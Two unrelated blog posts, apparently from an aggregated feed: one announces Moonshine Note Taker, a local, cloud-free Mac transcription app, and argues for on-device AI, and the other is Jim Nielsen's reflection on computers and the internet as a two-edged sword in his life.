TL;DR – Please try Moonshine Note Taker on your Mac! For years I’ve been telling people that AI wants to be local, that on-device models aren’t just a poor man’s alternative to cloud solutions, and that for some applications they can actually provide a much better user experience. It’s been an uphill battle though, because models all start in a datacenter and using cloud APIs is often so much easier for developers. There was a saying at Google that a picture is worth a thousand words, but a working demonstration is worth a thousand pictures, so with the release of the new Moonshine models I decided to show the advantages in a tangible way.

As a CEO my primary job seems to be joining meetings to nod sagely along while I try to figure out what’s going on, and to remember what we decided in previous meetings. Like a lot of people whose job involves this kind of work, I’ve found AI meeting note taking and transcription apps increasingly useful, but I kept wishing the user experience was better:

- It was often hard to correct or format the transcriptions, especially during meetings.
- The results would end up on a website I’d have to log into, or in my inbox, when I usually just want to save them on my laptop.
- Even if an app gave me a live view, there was usually a long delay before text appeared, and it didn’t update very frequently.
- I found trying to review the notes afterwards more difficult than it needed to be. I often wanted to hear the recording for an important sentence to help my understanding, and most apps don’t let you do that.
- Trusting a startup to store and protect very sensitive conversations makes me nervous. Servers full of thousands of people’s meetings are always going to be tempting targets for hackers, and you never know when a startup’s business model will change.
- I already have a thousand subscriptions, keeping track of them is a pain, and there were often usage limits even when I did pay.

I was also frustrated as an engineer that using the cloud for this use case was an inelegant solution. Speech to text deserves to be a core operating system function, just like keyboard drivers, and using the cloud adds unneeded complexity.

To address these issues, I’ve just released the first version of Moonshine Note Taker, for Macs. If you get a chance, please give it a try and let me know what you think. I’m hoping this will be a tangible demonstration of the power of local AI, and inspire more integrations of the Moonshine framework into new and existing applications, so feedback will help a lot.

- You can edit and lay out the notes as people are talking with no delay, and using a familiar native Apple interface.
- The results are . files that you save just like any other document, locally on your machine, never touching the cloud.
- The transcriptions show up almost instantaneously.
- Audio is saved alongside the transcription, and playing back a particular section is as simple as selecting the text or moving the caret and pressing the play button.
- There is absolutely no connection to the cloud. All data is kept entirely on your drive, and can be deleted instantly whenever you decide. Because it’s local, your app will never be bricked by an acquisition or pivot either.
- Because I don’t have to pay server costs, I can afford to make this free and open source without losing money, and I’ll never have to impose usage limits.

Jim Nielsen 2 days ago

Computers and the Internet: A Two-Edged Sword

Dave Rupert articulated something in “Priority of idle hands” that’s been growing in my subconscious for years:

I had a small, intrusive realization the other day that computers and the internet are probably bad for me […] This is hard to accept because a lot of my work, hobbies, education, entertainment, news, communities, and curiosities are all on the internet. I love the internet, it’s a big part of who I am today

Hard same. I love computers and the internet. Always have. I feel lucky to have grown up in the late ’90s / early ’00s, where I was exposed to the fascination, excitement, and imagination of PCs, the internet, and then “mobile”. What a time to make websites!

Simultaneously, I’ve seen how computers and the internet are a two-edged sword for me: I’ve cut out many great opportunities with them, but I’ve also cut myself a lot (and continue to). Per Dave’s comments, I have this feeling somewhere inside of me that the internet and computers don’t necessarily align in support of my own, personal perspective of what a life well lived is for me. My excitement and draw to them also often leave me with a feeling of “I took that too far.” I still haven’t figured out a completely healthy balance (but I’m also doing ok).

Dave comes up with a priority of constituencies to deal with his own realization. I like his. Might steal it. But I also think I need to adapt it, make it my own — but I don’t know what that looks like yet. To be honest, I don't think I was ready to confront any of this, but reading Dave’s blog forced it out of my subconscious and into the open, so now I gotta deal. Thanks Dave.
